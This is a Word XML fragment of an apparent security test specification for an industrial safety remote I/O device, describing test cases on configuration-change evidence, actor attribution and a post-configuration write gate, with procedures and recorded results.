        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715F64" w:rsidRPr="006D5B99"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715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F64">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338DCCC8" w14:textId="00A61187"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Kali (curl), TIA laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715F64" w:rsidRPr="006D5B99"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715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F64">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6068E2" w14:textId="7DFB172B"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TIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715F64" w:rsidRPr="006D5B99"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715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F64">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="702B592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A07C29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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C13FA0" w14:textId="2FB7E442"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cm_rq009-02_log_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB2A10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(Online &amp; Diagnostics &gt; Identification &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D7B94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Maintenance &gt; I&amp;M4), record F_iParCRC/F_Par_CRC.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEC5DD8"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D8FB03"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Authorized parameter change (as in TC-RQ004-04, step 1): change a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4422903C"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parameter, recompute iParCRC via ifm-CRC-Tool, compile + download.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D042815"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Read I&amp;M4 signature again (new value); read the error log again:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2382A91D" w14:textId="277DE442"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cm_rq009-02_log_after_change.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="669E7E3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695C3B00"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Cold start (disconnect/reconnect power cable).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12504BFD"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p>
          <w:p w14:paraId="2D7FEC59"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Re-read both indicators:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9AD818" w14:textId="5DBABDDC"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cm_rq009-02_log_after_coldstart.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1260C852" w14:textId="77777777" w:rsidR="00715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F6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read I&amp;M4 signature again.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788CCD87" w14:textId="25F19CBA" w:rsidR="00715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F6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cm_rq009-02_log_after_change.json cm_rq009-02_log_after_coldstart.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715F64" w:rsidRPr="006D5B99"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3AF38C5B" w:rsidR="00715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F64">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3F9D7B" w14:textId="32B8D85E" w:rsidR="00715F64" w:rsidRPr="006D5B99" w:rsidRDefault="00715F64" w:rsidP="00715F6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the I&amp;M4 signature </w:t>
            </w:r>
            <w:r w:rsidR="00D41838" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>error-log entry does not confirms an asymmetric, incomplete evidence trail for configuration modifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581EC351" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B55665" w14:textId="70297E50" w:rsidR="0011719C" w:rsidRPr="00F50EBA" w:rsidRDefault="0011719C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50EBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ009-03 - Actor Attribution Is Delegated, Not Device-Resident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E8A77" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="003A144C">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6D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B42AC3E"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E6694E7" w14:textId="6CB3AE4E" w:rsidR="003A144C" w:rsidRPr="006D5B99"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2.12 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60709E81" w14:textId="5518D29D" w:rsidR="003A144C" w:rsidRPr="006D5B99"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3A144C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC99AD0" w14:textId="0302B966" w:rsidR="003A144C" w:rsidRPr="006D5B99"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3A144C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA171E2" w14:textId="6DA1D885" w:rsidR="003A144C" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABA0117" w14:textId="1247DA88"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Perform an </w:t>
            </w:r>
            <w:r w:rsidR="000B3D99" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> configuration change from a known engineering-tool user.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC8CD9C"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every device-side evidence field for any actor/identity attribute.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E84B60F" w14:textId="77777777" w:rsidR="008B5449"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controller/engineering side for where the actor identity resides.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBFC611" w14:textId="544935DD" w:rsidR="003A144C" w:rsidRPr="006D5B99"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where (if anywhere) non-repudiation is anchored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F587CDE" w14:textId="317CD761" w:rsidR="00975F1E"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Gap-</w:t>
            </w:r>
            <w:r w:rsidR="006C496F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AE91B8" w14:textId="58FD7AAF" w:rsidR="003A144C" w:rsidRPr="006D5B99"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device-side field carries an actor identity </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.12 not met at the device; attribution only at the controller/engineering layer </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="003A144C" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE16DD0" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="003A144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6D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C1F3E1" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99"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3A144C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="135C37EA" w14:textId="49A8E142" w:rsidR="003A144C" w:rsidRPr="006D5B99"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TC-RQ009-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E0E2E" w:rsidRPr="006D5B99"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7E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B47268" w14:textId="61FAF4A6" w:rsidR="007E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2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 Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E0E2E" w:rsidRPr="006D5B99"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7E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5543B684" w14:textId="530EAC60"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7E0E2E" w:rsidRPr="006D5B99"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7E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A0DD31" w14:textId="58CF56EA"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Perform an authorized parameter change via TIA as in TC-RQ004-04 step 1.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16528489"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all available evidence fields on the SRIO for an actor-identity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B3262D"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attribute:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CC8535"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E1F1BA5" w14:textId="435AB5B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cm_rq009-03_errorlog.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A74572A"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check I&amp;M1-I&amp;M4 for any user-identity field.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C40D85F" w14:textId="77777777" w:rsidR="007E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2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On the PLC/engineering side, check where the attribution actually</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3722C946" w14:textId="345DCE33" w:rsidR="007E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="00DD7F6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resides (TIA project history, Windows user account, TIA project version control if used).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E0E2E" w:rsidRPr="006D5B99"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25957DEF" w:rsidR="007E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E2E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32507E13" w14:textId="21EBBFF8" w:rsidR="007E0E2E" w:rsidRPr="006D5B99" w:rsidRDefault="007E0E2E" w:rsidP="007E0E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no field on the SRIO itself contains an actor identity; attribution exists only at the PLC/engineering layer </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-1 (attribution is delegated, not device-resident).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62F60BC6" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E39E27" w14:textId="77777777" w:rsidR="00920F16" w:rsidRPr="006D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00920F16">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">TC-RQ009-04 - </w:t>
      </w:r>
      <w:r w:rsidR="00920F16" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post-Configuration-Phase Write Gate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED28883" w14:textId="7770FE95" w:rsidR="002F7C5E" w:rsidRPr="006D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00920F1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6D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220BE2B2"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0476DC0B" w14:textId="4F1BD7E4"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6D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-009 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.4 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E50BD0F" w14:textId="3C89A51C"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2F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448A23C0" w14:textId="75650207" w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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2F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC1834B" w14:textId="3E1CE8DA" w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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 the temporal write-gate: an attempt to write configuration records after the configuration phase has ended is rejected, and confirm whether the blocked attempt itself generates any evidence entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F09291D"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Complete the configuration phase and reach operation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7B1C19"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 acyclic configuration write after the configuration phase end.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F1A766" w14:textId="77777777" w:rsidR="00C8285F"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rejection.</w:t>
